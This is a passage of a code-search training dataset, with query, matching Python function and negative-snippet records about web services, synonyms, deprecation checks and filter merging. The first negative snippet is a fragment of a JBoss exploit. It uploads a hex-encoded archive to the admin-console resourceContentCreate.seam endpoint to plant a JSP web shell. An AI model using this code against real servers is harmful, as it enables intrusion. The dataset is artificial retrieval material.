\"\\x9d\\xed\\x29\\x2e\\xc0\\x80\\xb0\\x80\\xec\\x32\\xed\\x47\\x4c\\x36\\x57\\x90\\x9d\\xc2\\xc6\"\n \"\\x03\\x3c\\x30\\xdc\\xa6\\x03\\x2c\\x08\\x8e\\x03\\x03\\x43\\x58\\x64\\x22\\xc9\\x7d\\x05\\xc9\"\n \"\\x7e\\x71\\xa6\\x50\\x66\\x0c\\x20\\x29\\x6d\\xd8\\xb5\\xba\\x60\\xc3\\x7f\\xfb\\x06\\xfb\\x9b\"\n 
\"\\x8e\\xd7\\x53\\xcd\\xc2\\x8d\\xd7\\xd6\\x4f\\xd1\\x6e\\xeb\\xaf\\x20\\x57\\x94\\x97\\xf2\\x7a\"\n \"\\x91\\xa3\\x4b\\xf7\\x18\\x4b\\x78\\x8b\\x53\\x65\\xa4\\xb8\\xf6\\xde\\xfa\\xd6\\xff\\xd1\\x51\"\n \"\\x53\\xfe\\xb1\\xbd\\x46\\x06\\xab\\xe8\\x06\\x88\\xba\\xb2\\x39\\xf2\\x10\\xae\\x25\\xe0\\x61\"\n \"\\xc9\\x43\\xd4\\xc9\\x99\\x5b\\xc5\\x5b\\xf6\\x39\\x9b\\x54\\x44\\xe3\\xdd\\xd9\\x39\\xfa\\x2b\"\n \"\\x15\\x55\\x94\\x69\\x53\\xe0\\xe2\\xcf\\xa9\\x14\\x73\\x6d\\x78\\xaa\\x0b\\x78\\x1d\\x27\\x3b\"\n \"\\x39\\x56\\x62\\xca\\x2a\\x67\\x37\\xb1\\x12\\x14\\x59\\xbf\\x73\\x8b\\xf5\\xd3\\x0d\\xe6\\x58\"\n \"\\x2d\\xa3\\xc6\\x90\\xae\\x31\\x79\\xa5\\x5d\\xca\\x68\\x00\\xcc\\x59\\xd5\\x75\\x11\\x57\\xd0\"\n \"\\xbf\\x02\\xd1\\x0d\\x65\\x02\\x60\\x7d\\xbb\\xfd\\xf8\\xe4\\x3a\\xf7\\xff\\xa9\\xdd\\x1d\\x95\"\n \"\\xf7\\xfa\\x5a\\x2a\\x74\\x88\\xc5\\xf6\\x94\\xcc\\xf6\\x2a\\x79\\x3e\\x90\\x29\\xb8\\xf3\\x07\"\n \"\\xb4\\xcb\\x46\\x8c\\x71\\xe6\\xf1\\xf3\\xcc\\xe6\\x21\\x99\\xdf\\x15\\x10\\x63\\xf3\\xc5\\xd8\"\n \"\\x79\\xfc\\xbb\\xaa\\x6b\\x65\\x9e\\x85\\x76\\x7a\\xf1\\xcb\\xbf\\x50\\x4b\\x07\\x08\\x25\\x39\"\n \"\\x60\\x50\\x70\\x03\\x00\\x00\\x7a\\x07\\x00\\x00\\x50\\x4b\\x01\\x02\\x14\\x00\\x14\\x00\\x08\"\n \"\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x09\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x4d\"\n \"\\x45\\x54\\x41\\x2d\\x49\\x4e\\x46\\x2f\\xfe\\xca\\x00\\x00\\x50\\x4b\\x01\\x02\\x14\\x00\\x14\"\n \"\\x00\\x08\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\\x05\\xa0\\x0e\\xbc\\x43\\x00\\x00\\x00\\x44\\x00\"\n \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3d\\x00\\x00\"\n \"\\x00\\x4d\\x45\\x54\\x41\\x2d\\x49\\x4e\\x46\\x2f\\x4d\\x41\\x4e\\x49\\x46\\x45\\x53\\x54\\x2e\"\n \"\\x4d\\x46\\x50\\x4b\\x01\\x02\\x14\\x00\\x14\\x00\\x08\\x08\\x08\\x00\\x68\\x7c\\x98\\x48\\x25\"\n \"\\x39\\x60\\x50\\x70\\x03\\x00\\x00\\x7a\\x07\\x00\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\xc2\\x00\\x00\\x00\\x6a\\x65\\x78\\x77\\x73\\x33\\x2e\\x6a\\x73\"\n \"\\x70\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00\\x03\\x00\\x03\\x00\\xb5\\x00\\x00\\x00\\x6a\\x04\"\n \"\\x00\\x00\\x00\\x00\")\n\n data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload)\n try:\n r = pool.request('POST', url + \"/admin-console/secure/resourceContentCreate.seam\", headers=headers,body=data)\n if r.status != 302:\n data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload)\n r = pool.request('POST', url + \"/admin-console/secure/resourceContentCreate.seam\", headers=headers, body=data)\n except:\n sleep(1)\n\n return get_successfully(url, \"/jexws3/jexws3.jsp\")\n\n else:\n print(RED + \"\\n * Authentication failed!\" + ENDC)\n return 404",
"def show_privileges(self):\n print(\"Here is the privileges of an administrator: \")\n for privilege in self.privileges:\n print(\"- \" + privilege.title())",
"def getPageManagedUser(self):\n self.driver.get(MANAGED_USER)",
"def click_logout(self):\n self.find_element_by_xpath(self.profile_menu_xpath).click()\n logout_btn_element = WebDriverWait(self.driver, 30).until(\n EC.element_to_be_clickable((By.XPATH, self.logout_btn_xpath)))\n logout_btn_element.click()",
"def admin_users():\n users = User.select()\n return render_template('users.html', users=users)",
"def displayLogin(self):\n self.l1.setVisible(False)\n self.l2.setVisible(False)\n self.l3.setVisible(False)\n self.logl1.setVisible(True)\n self.adminl1.setVisible(False)\n\n self.adminUsername.setVisible(True)\n self.adminPassword.setVisible(True)\n self.log.setVisible(True)\n\n self.lRecharge.setVisible(False)\n self.bRecharge.setVisible(False)\n self.moneyBox.setVisible(False)\n\n self.username.setVisible(False)\n self.name.setVisible(False)\n self.surname.setVisible(False)\n self.bCreateAccount.setVisible(False)\n\n self.lAddDevice.setVisible(False)\n self.username2.setVisible(False)\n self.bAddDevice.setVisible(False)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Retrieves all the synonym names of a data collection (this list includes the original name).
|
def getDataTypeSynonyms(self, name):
    res = self.serv.getDataTypeSynonyms(name)
    return res
|
[
"def synonyms(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:\n return pulumi.get(self, \"synonyms\")",
"def _get_pubchem_synonyms(self):\n syn_list = []\n url = PUBCHEM_SYNONYMS_PATH % self._get_cid()\n try:\n response = requests.get(url)\n except requests.exceptions.HTTPError:\n return None\n pc_dict = json.loads(response.content)\n for item in pc_dict['Record']['Information']:\n try:\n syn_list = item['StringValueList']\n except:\n continue\n return syn_list",
"def find_synonyms(item):\n url = parse_url_for_request(item)\n try:\n synonym = get_jsonparsed_data(url)['synsets'][0]['terms']\n results = []\n for i in range(len(synonym)):\n results.append(synonym[i]['term'])\n except IndexError:\n results = []\n return results",
"def synonyms(word_tag):\n _type = TPU.tag_type(word_tag[1])\n root = wordnet.morphy(word_tag[0])\n if not root:\n root = word_tag[0]\n\n _result = set()\n _result.add(root)\n if _type:\n syn_sets = wordnet.synsets(root, pos=_type)\n for syn_set in syn_sets:\n syn = syn_set.name().split('.')[0]\n if not '_' in syn:\n _result.add(syn)\n return list(_result)",
"def all_synonyms(tagged_sentences):\n _result = []\n for sent in tagged_sentences:\n for word in sent:\n _result.append(TPU.synonyms(word))\n return _result",
"def get_wordnet_syns(word):\n synonyms = []\n regex = r\"_\"\n pat = re.compile(regex)\n synset = nltk.wordnet.wordnet.synsets(word)\n for ss in synset:\n for swords in ss.lemma_names:\n synonyms.append(pat.sub(\" \", swords.lower()))\n synonyms = f7(synonyms)\n return synonyms",
"def synonyms(self, defnNum=0, allowEmpty=True, **filters):\n\n data = self._filter(mode='syn', defnNum=defnNum, filters=filters)\n\n # the word does not exist. return empty.\n if not data:\n return []\n \n if allowEmpty:\n return data\n else:\n return [d for d in data if len(d) > 0]",
"def getSchemataNames(self):\n lst = []\n for f in self.fields():\n if not f.schemata in lst:\n lst.append(f.schemata)\n return lst",
"def find_synonyms(word):\n synonyms = [' '.join(syn_name.split('_')) for syn in wordnet.synsets(word.lower()) for syn_name in syn.lemma_names()\n if syn_name.lower() != word.lower() and\n len(syn_name.split('_')) == 1 and\n lemmatizer.lemmatize(syn_name) != lemmatizer.lemmatize(word.lower()) and\n nltk.pos_tag([syn_name])[0][1] == nltk.pos_tag([word.lower()])[0][1]\n ]\n return synonyms",
"def get_data_name_list(self):\n return self._data_name_list",
"def get_synonyms(syns_entry):\n synonyms = []\n for synonym in syns_entry:\n match = re.match(r'^\\\"(.+)\\\" (EXACT|RELATED|NARROW|BROAD)',\n synonym)\n syn, status = match.groups()\n if status in allowed_synonyms:\n synonyms.append(syn)\n return synonyms",
"def get_all_names(self):\n all_names = set()\n \n return all_names\n\n # Might be helpful... I know nothing about nginx lens",
"def names(self):\n\t\treturn self.store().names()",
"def names(self, namespace=None):\n current_namespace = self.namespace\n if namespace is None:\n namespace = self.namespace\n\n names = []\n if namespace == \"all\":\n # FOR EACH NAMESPACE, ADD THE NAME OBJECTS TO THE LIST OF NAMES\n for namespace in self.namespaces():\n self.namespace = namespace\n names.extend([x[\"name\"] for x in self.metadata(output=\"list\")])\n else:\n # RETURN ALL THE NAMES AND OBJECT_IDS IN THAT NAMESPACE ONLY\n names = [\n x[\"name\"]\n for x in self.metadata(output=\"list\")\n if x[\"namespace\"] == self.namespace\n ]\n\n self.namespace = current_namespace\n return names",
"def optGetSynonym(*args):\n return _optcc.optGetSynonym(*args)",
"def synonyms(self, term):\n try:\n obj = self._cm[term]\n it = self._cm.synonyms(obj)\n except KeyError:\n try:\n obj = self._qm[term]\n it = self._qm.synonyms(obj)\n except KeyError:\n try:\n obj = self._fm[term]\n it = self._fm.synonyms(obj)\n except KeyError:\n it = ()\n for k in it:\n yield k",
"def getSNPSetsList() :\n\timport rabaDB.filters as rfilt\n\tf = rfilt.RabaQuery(SNPMaster)\n\tnames = []\n\tfor g in f.iterRun() :\n\t\tnames.append(g.setName)\n\treturn names",
"def get_datacenters_names_list():\n return [cl.get_name() for cl in get_datacenters_list()]",
"def _words_from_synset(synset):\n words = set()\n\n # We add the words from the synset...\n for lemma_name in synset.lemma_names():\n words.add(lemma_name)\n\n return words"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Retrieves the physical location (URL) of a web page providing knowledge about a specific entity, using a specific resource.
|
def getLocation(self, uri, resource):
    res = self.serv.getLocation(uri, resource)
    return res
|
[
"def get_url_page(self, product):\n return product.get('url')",
"def url_for(self, path_or_page):\n\n if isinstance(path_or_page, Page):\n return self.relpath(self._absolute_path(path_or_page.path), is_page=True)\n else:\n return self.relpath(path_or_page)",
"def page_url(self, page_pk): \n self.c.execute(\"SELECT url FROM pages WHERE id=%s\", (page_pk,))\n return self.c.fetchone()[0]",
"def get_page_url(self):\n mission_part = 'mission=' + self.mission\n id_num = self.image_id.split('-')[2]\n id_part = 'roll=E&frame=' + id_num\n page_url = infopage + mission_part + '&' + id_part\n return page_url",
"def get_external_url():",
"def resource_location(self):\n if \"resourceLocation\" in self._prop_dict:\n return self._prop_dict[\"resourceLocation\"]\n else:\n return None",
"def object_url(self, obj):\n\n return resource_url(obj, self.request)",
"def get_uri(self, request):",
"def _get_lti_view_url(self, resource):\n return f\"/lti/documents/{resource.pk}\"",
"def url(self):\n if self.slug:\n return self.slug\n return url_for('page_view',page_id=self.id)",
"def get_resource(self):\n\n return urllib2.urlopen(self.endpoint)",
"def entity_url_path(baseuri, entityref):\n uri = urljoin(baseuri, entityref)\n return urlparse(uri).path",
"def get_absolute_url(self):\r\n return self.content_object.get_absolute_url()",
"def url(entity):\n return '{ch_base}{ch_ver}{ch_entity}?token={ch_token}'.format(ch_base=CH_BASE,\n ch_ver=CH_API_VER,\n ch_entity=entity,\n ch_token=CH_TOKEN)",
"def homepage_url(self):\n return self.request.link(self.app.org)",
"def _getURL(self):\n return \"http://%s.%s\" % (self.key, self.baseurl)",
"def get_url(self, instance):\n return instance.url if not instance.is_self else None",
"def item_url(self):\n return self.get_url(item=True)",
"def get_linked_resource(self, resource, rel, media_type): # NOQA\n return self.get_resource(find_link(resource, rel, media_type).href)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Retrieves some information about these Web Services.
|
def getServicesInfo(self):
    res = self.serv.getServicesInfo()
    return res
|
[
"def get_services(self):\n xpath = [\"Services\", \"Service\"]\n return self.find_anywhere(xpath)",
"def services(self):\n _log.debug('get service list')\n result = self._requestJSON('services', '')\n return self._getKey(result, 'name')",
"def get_service_info(self):\n res = self.api_client.GetServiceInfo()\n return res.response().result",
"def getServicesList( self ):\n\n res = self.rsS.getServicesList()\n if not res[ 'OK' ]:\n raise RSSException, where( self, self.getServicesList ) + \" \" + res[ 'Message' ]\n\n return res",
"def services(self):\n return self.__services",
"def get_all_services():\n global tts_srv\n tts_srv = QI_SESSION.service(\"ALTextToSpeech\")\n\n global al_srv\n al_srv = QI_SESSION.service(\"ALAutonomousLife\")\n\n global ba_srv\n ba_srv = QI_SESSION.service(\"ALBasicAwareness\")\n\n global ab_srv\n ab_srv = QI_SESSION.service(\"ALAutonomousBlinking\")\n\n global motion_srv\n motion_srv = QI_SESSION.service(\"ALMotion\")\n\n global video_srv\n video_srv = QI_SESSION.service(\"ALVideoDevice\")\n\n global tablet_srv\n tablet_srv = QI_SESSION.service(\"ALTabletService\")\n\n global as_srv\n as_srv = QI_SESSION.service(\"ALAnimatedSpeech\")\n\n global ap_srv\n ap_srv = QI_SESSION.service(\"ALAnimationPlayer\")\n\n global posture_srv\n posture_srv = QI_SESSION.service(\"ALRobotPosture\")\n\n global ar_srv\n ar_srv = QI_SESSION.service(\"ALAudioRecorder\")\n\n global ad_srv\n ad_srv = QI_SESSION.service(\"ALAudioDevice\")\n\n global fd_srv\n fd_srv = QI_SESSION.service(\"ALFaceDetection\")\n\n global mem_srv\n mem_srv = QI_SESSION.service(\"ALMemory\")\n\n global lm_srv\n lm_srv = QI_SESSION.service(\"ALListeningMovement\")\n\n global sm_srv\n sm_srv = QI_SESSION.service(\"ALSpeakingMovement\")\n\n global audio_player\n audio_player = QI_SESSION.service(\"ALAudioPlayer\")\n\n global led_srv\n led_srv = QI_SESSION.service(\"ALLeds\")",
"def getServiceNames(self):\n self.send_getServiceNames()\n return self.recv_getServiceNames()",
"def _all_services(type_, *args, **kwargs):\n return all_srvs[type_]",
"def get_all_services(limit=None, columns=None, extra_filter=None):\n return query(\"GET services\\n\", limit=limit, columns=columns, \n item_type=\"services\" , extra_filter=extra_filter)",
"def list(cls, context, limit=None, marker=None, sort_key=None,\n sort_dir=None, filters=None):\n db_webservices = cls.dbapi.get_webservice_list(filters=filters,\n limit=limit,\n marker=marker,\n sort_key=sort_key,\n sort_dir=sort_dir)\n return [Webservice._from_db_object(cls(context), obj)\n for obj in db_webservices]",
"def get_all_service_info(self):\n result = []\n\n for k in self.service_information.keys():\n ip = k\n for p in self.service_information[k].keys():\n proto, port = p.split(\"/\")\n service_list = self.service_information[k][p]\n status = service_list[0]\n service = service_list[1]\n service_info = service_list[2]\n result.append({\n 'ip': str(ipaddress.IPv4Address(ip)), \n 'proto': proto, \n 'port': port, \n 'status': status, \n 'service': service,\n 'service_info': service_info\n })\n\n return result",
"def parse_services(self):\n #Client\n for item in self.client_config.get(\"services\"):\n service = Service(item[\"name\"],type=item[\"type\"],parameters=item)\n self.client_services_list.append(service) \n\n #Server\n for item in self.server_config.get(\"services\"):\n service = Service(item[\"name\"],type=item[\"type\"],parameters=item)\n self.server_services_list.append(service)",
"def GetServices(self):\n return json.dumps(SERVICES)",
"def get_availables_services(self):\r\n self._service_locator.get_availables_services()",
"def get_clients_services_info(self):\n with self.clients_lock:\n return [c.get_services_info() for c in self.clients]",
"def _QueryServices(self):\n init_prop_header = 'init.svc.'\n props = self._Props()\n return dict([(k[len(init_prop_header):], v) for k, v in props.iteritems()\n if k.startswith(init_prop_header)])",
"def service_names(self):\n return self.services.keys()",
"def test_get_services(self):\n # Create a few application endpoints.\n ezdiscovery.register_endpoint('foo', 'bar', 'localhost', 8000)\n ezdiscovery.register_endpoint('foo', 'baz', 'localhost', 8001)\n ezdiscovery.register_endpoint('harry', 'sally', 'localhost', 8080)\n\n # Make sure it returns the right count for a single service.\n self.assertEqual(2, len(ezdiscovery.get_services('foo')))\n\n self.assertEqual(1, len(ezdiscovery.get_services('harry')))\n self.assertEqual('sally', ezdiscovery.get_services('harry')[0])",
"def get(self):\n return getServicesByVendor(self)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Says if a URI of a data collection is deprecated.
|
def isDeprecated(self, uri):
    res = self.serv.isDeprecated(uri)
    res = self._boolean_convertor(res)
    return res
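
The `_boolean_convertor` call suggests the underlying web service returns booleans as strings. A hypothetical sketch of such a helper (the real implementation is not shown in this document) might be:

# Hypothetical helper, for illustration only: SOAP-style services often
# return "true"/"false" strings rather than native booleans.
def _boolean_convertor(value):
    return str(value).strip().lower() == "true"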
|
[
"def _is_deprecated(self, api_node: doc_generator_visitor.ApiTreeNode):\n if doc_controls.is_deprecated(api_node.py_object):\n return True\n\n decorator_list = signature.extract_decorators(api_node.py_object)\n if any('deprecat' in dec for dec in decorator_list):\n docstring = getattr(api_node.py_object, '__doc__') or ''\n return 'THIS FUNCTION IS DEPRECATED' in docstring\n\n return False",
"def deprecated(self):\n self._deprecated = True\n return self",
"def deprecated(self):\n return self.data['record']['Deprecated'] if 'Deprecated' in self.data['record'] else None",
"def _is_valid_deprecated(self, location, generated_attribute, generated_attribute_info):\n if DEPRECATED in generated_attribute_info:\n self._add_warning(location, WARN_ATTRIBUTE_DEPRECATED, message=generated_attribute_info[DEPRECATED],\n attribute=generated_attribute)\n return False\n return True",
"def test_loreDeprecation(self):\r\n reflect.namedAny(\"twisted.lore\")\r\n warningsShown = self.flushWarnings()\r\n self.assertEqual(1, len(warningsShown))\r\n self.assertEqual(\r\n \"twisted.lore was deprecated in Twisted 14.0.0: \"\r\n \"Use Sphinx instead.\", warningsShown[0]['message'])",
"def storage_deprecation_warning():\n\n warnings.warn(message='Storage \"client_standart\" is deprecated and will be removed. Use \"client_standard\" instead.',\n category=DeprecationWarning)",
"def test_getDeprecationDocstring(self):\n version = Version(\"Twisted\", 8, 0, 0)\n self.assertEqual(\n \"Deprecated in Twisted 8.0.0.\", _getDeprecationDocstring(version, \"\")\n )",
"def isObsolete(self) -> bool:\n ...",
"def test_urlDeprecation(self):\n from twisted.python import url\n url\n\n warningsShown = self.flushWarnings([self.test_urlDeprecation])\n self.assertEqual(1, len(warningsShown))\n self.assertEqual(\n (\"twisted.python.url was deprecated in Twisted 17.5.0:\"\n \" Please use hyperlink from PyPI instead.\"),\n warningsShown[0]['message'])",
"def test_deprecated(self):\n @misc.deprecated\n def function():\n return 1, None\n \n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n # test whether the function still works\n self.assertEqual(function(), (1, None))\n # test whether a warning was emitted\n self.assertEqual(len(w), 1)\n self.assertTrue(issubclass(w[-1].category, DeprecationWarning))\n self.assertIn(\"deprecated\", str(w[-1].message))",
"def test_old_argument_deprecation(self):\n post_data = {\n 'nick': 'johndoe',\n }\n cnt = Person.objects.count()\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n response = self.client.post(reverse('admin:admin_custom_urls_person_add'), post_data)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Person.objects.count(), cnt + 1)\n # We should get a DeprecationWarning\n self.assertEqual(len(w), 1)\n self.assertTrue(isinstance(w[0].message, DeprecationWarning))",
"def test_methodIsDeprecated(self):\n sslverify.OpenSSLCertificateOptions(\n privateKey=self.sKey,\n certificate=self.sCert,\n method=SSL.SSLv23_METHOD,\n )\n\n message = (\"Passing method to twisted.internet.ssl.CertificateOptions \"\n \"was deprecated in Twisted 17.1.0. Please use a \"\n \"combination of insecurelyLowerMinimumTo, raiseMinimumTo, \"\n \"and lowerMaximumSecurityTo instead, as Twisted will \"\n \"correctly configure the method.\")\n\n warnings = self.flushWarnings([self.test_methodIsDeprecated])\n self.assertEqual(1, len(warnings))\n self.assertEqual(DeprecationWarning, warnings[0]['category'])\n self.assertEqual(message, warnings[0]['message'])",
"def test_deprecatedUpdatesDocstring(self):\n\n def localDummyCallable():\n \"\"\"\n Do nothing.\n\n This is used to test the deprecation decorators.\n \"\"\"\n\n version = Version(\"Twisted\", 8, 0, 0)\n dummy = deprecated(version)(localDummyCallable)\n\n _appendToDocstring(localDummyCallable, _getDeprecationDocstring(version, \"\"))\n\n self.assertEqual(localDummyCallable.__doc__, dummy.__doc__)",
"def test_legacy_deprecated(recwarn):\n warnings.simplefilter('always')\n from luma.led_matrix import legacy\n\n assert len(recwarn) == 1\n w = recwarn.pop(DeprecationWarning)\n\n assert str(w.message) == legacy.deprecation_msg",
"def is_deprecated_look_in_description(property_dict: Dict[str, Any]) -> bool:\n if DESCRIPTION not in property_dict:\n return False\n\n return bool(re.match(DEPRECATED_PATTERN, property_dict[DESCRIPTION]))",
"def deprecated():\n\n def wrapper(func):\n @wraps(func)\n def wrapped(self, *args, **kwargs):\n (data, code, headers) = unpack(func(self, *args, **kwargs))\n headers[\"Deprecation\"] = \"true\"\n\n return (data, code, headers)\n\n return wrapped\n\n return wrapper",
"def test_getDeprecationWarningString(self):\n version = Version(\"Twisted\", 8, 0, 0)\n self.assertEqual(\n getDeprecationWarningString(self.test_getDeprecationWarningString, version),\n \"%s.DeprecationWarningsTests.test_getDeprecationWarningString \"\n \"was deprecated in Twisted 8.0.0\" % (__name__,),\n )",
"def key_is_deprecated(self, full_key):\n if full_key in self.__dict__[Map.DEPRECATED_KEYS]:\n print(\"Deprecated config key (ignoring): {}\".format(full_key))\n return True\n return False",
"def query_deprecate(self, req):\n self.assert_is_internal(req)\n data = req.json\n nodes = data['other']\n self_name = data['name']\n new_node = data['new']\n backups = data['backups']\n ring = HashRing(nodes + [new_node])\n deprecated = []\n for domain, username, bucket in self.storage.all_dbs():\n assert bucket.startswith('/')\n path = '/' + domain + '/' + username + bucket\n iterator = iter(ring.iterate_nodes(path))\n active_nodes = [iterator.next() for i in xrange(backups + 1)]\n deprecated_node = iterator.next()\n if deprecated_node == self_name and new_node in active_nodes:\n deprecated.append(\n {'path': path, 'domain': domain, 'username': username, 'bucket': bucket})\n db = self.storage.for_user(domain, username, bucket)\n db.deprecate()\n return Response(json={'deprecated': deprecated})"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Merge consecutive Filter(x), Filter(y) blocks into Filter(x && y) block.
|
def merge_consecutive_filter_clauses(ir_blocks):
    if not ir_blocks:
        return ir_blocks

    new_ir_blocks = [ir_blocks[0]]

    for block in ir_blocks[1:]:
        last_block = new_ir_blocks[-1]
        if isinstance(last_block, Filter) and isinstance(block, Filter):
            new_ir_blocks[-1] = Filter(
                BinaryComposition(u'&&', last_block.predicate, block.predicate))
        else:
            new_ir_blocks.append(block)

    return new_ir_blocks
|
[
"def _filter_chain(accumulated, additional):\n return lambda block_key: accumulated(block_key) and additional(block_key)",
"def filter_fir_shared(clock, reset, x, y, b):\n assert isinstance(x, Samples)\n assert isinstance(y, Samples)\n\n ntaps = len(b)\n scnt = Signal(intbv(ntaps+1, min=0, max=ntaps+2))\n pmax = x.data.max * x.data.max\n sop = Signal(intbv(0, min=-pmax, max=pmax))\n scale = int(len(x.data)-1)\n\n xd = [Signal(intbv(0, min=x.data.min, max=x.data.max))\n for _ in range(len(b))]\n\n @always_seq(clock.posedge, reset=reset)\n def beh_sop():\n y.valid.next = False\n if scnt == ntaps+1 and x.valid:\n # tap update loop\n xd[0].next = x.data\n for ii in range(1, len(b)-1):\n xd[ii].next = xd[ii-1]\n # compute the first product \n c = b[0]\n sop.next = c * x.data\n scnt.next = 1\n elif scnt == ntaps:\n assert not x.valid\n y.data.next = sop >> scale\n y.valid.next = True\n scnt.next = scnt + 1\n elif scnt < ntaps:\n assert not x.valid\n c = b[scnt]\n sop.next = sop + c * xd[scnt]\n scnt.next = scnt + 1\n\n return hdl.instances()",
"def filter_cascade(filters):\n def newFilter(image):\n for f in filters:\n image = f(image)\n return image\n return newFilter",
"def _transform_with_filters(self, block_structure):\n if not self._transformers['supports_filter']:\n return\n\n filters = []\n for transformer in self._transformers['supports_filter']:\n filters.extend(transformer.transform_block_filters(self.usage_info, block_structure))\n\n combined_filters = combine_filters(block_structure, filters)\n block_structure.filter_topological_traversal(combined_filters)",
"def concat_transition_block(\n self, x: tf.Tensor, filters: int, strides: int, use_squeeze_and_excite: bool\n ) -> tf.Tensor:\n infilters = int(x.shape[-1])\n assert filters == 2 * infilters\n\n residual = tf.keras.layers.MaxPool2D(pool_size=strides, strides=strides)(x)\n residual = tf.keras.layers.BatchNormalization(momentum=0.9, epsilon=1e-5)(\n residual\n )\n x = self.conv_block(x, infilters, use_squeeze_and_excite, strides)\n x = tf.keras.layers.add([x, residual])\n\n return tf.keras.layers.concatenate([residual, x])",
"def filter_iir(aIIRfilterList, bIIRfilterList, x):\n if len(aIIRfilterList[0]) == 3: # second-order sections:\n sos = [list(b) + list(a) for a, b in zip(aIIRfilterList,\n bIIRfilterList)]\n y = signal.sosfilt(sos, x)\n else:\n y = x\n for a, b in zip(aIIRfilterList, bIIRfilterList):\n y = signal.lfilter(b, a, y)\n return y",
"def two_image_filter( image1, image2 ):\n pass",
"def combine_filters(*args):\n def func(rec):\n for filt in args:\n if not filt(rec):\n return False\n return True\n return func",
"def gaborFilteringConcat(image, kernels):\n\n\tcvEqualizeHist(image,image)\n\tsrc_f = cvCreateImage(cvSize(image.width,image.height),IPL_DEPTH_32F,1)\n\tcvConvertScale(image,src_f,1.0/255)\n\n\tdest = cvCloneImage(src_f)\n\tdest_mag = cvCloneImage(src_f)\n\timg_aux = cvCreateImage(cvSize(image.width,image.height),IPL_DEPTH_8U, 1)\n\timg_total = cvCreateImage(cvSize(len(kernels)*image.width,image.height),IPL_DEPTH_8U, 1)\n\n\ti=0\n\tfor k in kernels:\n\t\tcvFilter2D(src_f, dest,k,cvPoint(-1,-1))\n\t\tcvPow(dest,dest_mag,2)\n\t\tcvZero(img_aux)\n\n\t\tcvConvertScale(dest, img_aux, 255.0)\n\t\tcvCopy(img_aux, cvGetSubRect(img_total,cvRect(i*img_aux.width,0,img_aux.width,img_aux.height)))\n\t\ti+=1\n\n\tcvSmooth(img_total,img_total)\n\tcvThreshold(img_total, img_total, 16, 255, CV_THRESH_BINARY)\n\n\treturn img_total",
"def merge_all_adjacent(self):\r\n for i in range(data.windows.__len__()):\r\n while self.mergeable(i,i+1):\r\n self.merge(i,i+1,False,False)\r\n self.reload()",
"def deinterlace(self, raw):\r\n\r\n # print >> sys.stderr, (\"Reading interlaced, w=%s, r=%s, planes=%s,\" +\r\n # \" bpp=%s\") % (self.width, self.height, self.planes, self.bps)\r\n \r\n flt_list = [self.ifilter0, self.ifilter1, self.ifilter2, self.ifilter3, self.ifilter4]\r\n # Values per row (of the target image)\r\n vpr = self.width * self.bpp\r\n\r\n # Make a result array, and make it big enough. Interleaving\r\n # writes to the output array randomly (well, not quite), so the\r\n # entire output array must be in memory.\r\n # fmt = 'BH'[self.bitdepth > 8]\r\n # a = array(fmt, [0]*vpr*self.height)\r\n source_offset = 0\r\n\r\n # after = [[0]*vpr] * self.height\r\n after = []\r\n for i in range(self.height):\r\n after.append([0]*vpr)\r\n \r\n for xstart, ystart, xstep, ystep in self._adam7:\r\n \r\n if xstart >= self.width:\r\n continue\r\n \r\n # Pixels per row (reduced pass image)\r\n ppr = int(math.ceil((self.width-xstart)/float(xstep)))\r\n row_size = int(math.ceil(self.bpp * ppr))\r\n recon = [0] * row_size\r\n for y in range(ystart, self.height, ystep):\r\n filter_type = raw[source_offset]\r\n source_offset += 1\r\n scanline = [ord(b) for b in raw[source_offset:source_offset+row_size]]\r\n source_offset += row_size\r\n recon = flt_list[ord(filter_type)](scanline,recon,self.bpp)\r\n if xstep == 1 and xstart==0:\r\n after[y][0:vpr] = recon[0:vpr]\r\n else:\r\n reconIndex = 0\r\n for xpos in range(xstart,self.width,xstep):\r\n after[y][xpos*self.bpp:xpos*self.bpp+self.bpp] = recon[reconIndex*self.bpp:reconIndex*self.bpp+self.bpp]\r\n reconIndex += 1\r\n \r\n return after",
"def test_run_filters_sequentially(self):\n def first_filter(model: AnalyticsEventModel):\n model.ExtraData[\"key\"] = \"firstFilter\"\n\n def last_filter(model: AnalyticsEventModel):\n model.ExtraData[\"key\"] = \"lastFilter\"\n\n event_model = create_event_model()\n last_filter(event_model)\n\n result = self.dispatcher.extend(with_filter(first_filter), with_filter(last_filter)).dispatch(EVENT_NAME)\n\n self.assertEqual(result.get(), RETURN_VALUE)\n self.event_model_writer.assert_called_once_with(event_model)",
"def filterMultiRunstop(events):\n filters = []\n filters.append( UndervoltageMerge() )\n filters.append( RunstopMerge() )\n filters.append( MultiRunstopMerge() )\n filters.append( KeepEventTypes(['MultiRunstopMerge']) )\n return runFilters(filters,events)",
